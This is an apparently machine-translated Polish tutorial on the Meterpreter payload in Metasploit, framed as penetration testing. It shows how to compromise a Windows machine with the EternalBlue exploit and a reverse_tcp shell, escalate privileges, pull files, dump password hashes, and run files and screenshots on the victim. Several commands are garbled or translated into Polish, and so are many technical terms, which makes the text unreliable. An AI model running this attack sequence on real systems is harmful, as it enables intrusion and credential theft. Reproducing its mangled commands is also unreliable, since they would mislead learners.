Wprowadzenie do miernika
MeterPreter to ładunek ataku w ramie Metasploit, który pozwala sprawcielowi kontrolować i nawigować po komputerze ofiary za pośrednictwem powłoki poleceń. Może okazać się bardzo wszechstronnym narzędziem, jeśli chodzi o testowanie penetracji. Jest to narzędzie po eksploatacji, które jest oparte na wtrysku DLL w pamięci, co oznacza, że wprowadza wtryskiwane DLL, utworzając nowy proces, który wymaga uruchomienia systemu do uruchomienia wtryskiwanego DLL. Może zapewnić dostęp do niewidzialnej powłoki poleceń na komputerze ofiar.
Został pierwotnie napisany dla Metasploit 2.x i jest zaktualizowany do metasploit 3.
Omówimy szczegółowo zastosowanie miernika, ale wcześniej powiedzmy ogólnie słowo o ładunku
Jakie są ładunki?
Ładunki w metasploit są modułami, co oznacza, że są fragmenty kodów w Metasploit, które działają w systemie zdalnym, którym kierujemy. Moduł exploit jest wysyłany jako pierwszy, który instaluje moduł ładunku w systemie. Następnie ładowanie zapewnia dostęp do atakującego (ograniczony lub pełny, zależy od zawartości ładunku). Aby dalej rozwinąć funkcjonowanie ładunków, musimy omówić jego typy, które mają 3 w sumie:
Syngiel
Te ładunki są całkowicie samodzielne, co oznacza, że mogą być tak podstawowe jak kody strażnika, które pozwalają użytkownikowi w system docelowy.
Stagers
Stagers to ładunki, które zbierają aplikacje w systemie docelowym i wysyłają je do atakującego. Ustanawia związek między ofiarą z naszą lokalną maszyną.
Gradacja
Gdy Stagers mają dostęp do systemu, pobierają moduły etapów. Etapy moduły usuwają czapkę rozmiaru na miernik.
Przykładami scen byłoby prostą powłokę, iPhone „ipwn”, moduły meterowe, wtrysk VNC.
Możesz wypracować rodzaj ładunku, zastanawiając się nad jego nazwą. Pojedyncze ładunki są zwykle w formacie /
Wykorzystanie za pomocą Miernik
Po pierwsze, uruchom konsolę MSF, wpisując następujące polecenie terminala w oknie terminalu Kali.
$ sudo msfconsole
Używamy odwrotnej_tcp jako stagera i miernika jako sceny.
Zaczniemy od skonfigurowania Eternal Blue Exploit. Wybierz (MS17_010_ETERNALBLUE), następnie ustaw Windows/x64/MeterPreter/reverse_tcp jako wybrany ładunek
Następnie skonfiguruj ustawienia exploit, a następnie uruchom polecenie exploit za pomocą polecenia exploit:
$ Ustaw ładunek Windows/x64/MeterPreter/reverse_tcp
$ set rhost 192.168.198.136
$ exploit
EternalBlue Exploit został aktywowany pomyślnie.
Wykorzystanie po wykorzystywaniu
Uzyskujemy dostęp i manipulujemy już upośledzonym systemem podczas eksploatacji.
Możemy zrobić wiele rzeczy teraz, kiedy mamy dostęp do systemu, ale jak wspomniano powyżej, mamy być skupieni głównie na pobieraniu informacji i uzyskiwaniu poświadczeń użytkownika tutaj
Zarządzanie przywilejem dostępu:
W zależności od modułu ładunku i wykorzystania, którego użyłeś, możesz mieć do czynienia z pewnymi ograniczeniami dostępu, które poważnie określi twoje umiejętności manewrowania maszyną ofiary. Możesz obejść ten problem z eskalacją przywilejów poprzez usunięcie haseł i manipulowanie rejestrami. Możesz także eskalować uprawnienia, używając systemu GET -COMMAND METERPRETER.
$ getSystem
$ getuid
Transfer pliku za pomocą miernika
Za pomocą MeterPreter możesz pobrać plik za pomocą komendy $ Download-.
$ pobierz/Windows/System32/Drivers/etc/hosts
Podobnie możesz również przesyłać informacje do komputera, używając $ przesyłaj- polecenie
Wyodrębnienie poświadczeń użytkownika:
Użyj skryptu kodu poświadczenie_collector, aby wyodrębnić informacje o kont użytkownika lub użyj modułu postu zrzutu skrótu do podobnego efektu.
Użyjemy modułu zrzutu skrótów, aby kontynuować zbiór poświadczeń. Wpisz następujące polecenie MSF.
$ uruchom post/Windows/Gather/Hashdump
Jak widzimy, uzyskaliśmy konta Coen, Guest i Administrant. Hash LM (admin) i ntlm (gościa) dotyczą pustych haseł, podczas gdy hash Coen to hasło, które musisz złamać. Możesz to zrobić za pomocą krakersa hasła.
Automatyzacja skrobania systemu
Nudne może być gromadzenie informacji z poszczególnymi instrukcjami wejściowymi, które musisz nadal karmić powłokę poleceń. Dogodnie możesz nieco zautomatyzować ten proces za pomocą skryptu winorośli. Skrypt zbiera informacje z ofiary i pobiera dane do naszej maszyny lokalnej. Zostaniesz powiedziany, gdzie jest zapisywane wyjście, jak widać w czwartej linii z góry:
$ run Wineum
Należy pamiętać, że ścieżka, na której przechowywane jest wyjście do każdego polecenia, może być inna od tej wyświetlanej tutaj.
Połączmy trochę więcej
Wykonanie plików
Możesz uruchomić dowolny plik w systemie, używając: Wykonaj -f . Obejmuje to zarówno pliki wykonywalne, jak i programy z wieloma plikami pomocniczymi. Na przykład, aby uruchomić wbudowaną aplikację kalkulatora w systemie systemu Windows, wpisz execute -f calc.exe
Robienie zrzutów ekranu
Możesz także przechwytywać zrzuty ekranu z punktu widzenia użytkownika. Po prostu wpisz zrzut ekranu w powładzie poleceń miernika, a otrzymasz zrzut ekranu wyświetlacza w systemie.
$ execute -f calc.exe
$ zrzut ekranu
Wniosek:
To było krótkie wprowadzenie do wtyczki MeterPreter w Framework Metasploit, a także krótki przewodnik, który pokazuje najbardziej podstawowe zastosowania. Nauczyliśmy się tutaj, w jaki sposób możemy naruszyć system systemu Windows OS z EternalBlue Exploit, aby uzyskać dostęp, a następnie użyć miernika do eskalacji uprawnień, gromadzenia informacji ręcznie i przez automatyczne polecenie winnicy. Nauczyliśmy się również wykonywać pliki na komputerze ofiary.
Miernik może służyć jako znaczny sposób wykrywania podatności, mimo że jest konglomeracją podstawowych narzędzi w ramach Metasploit.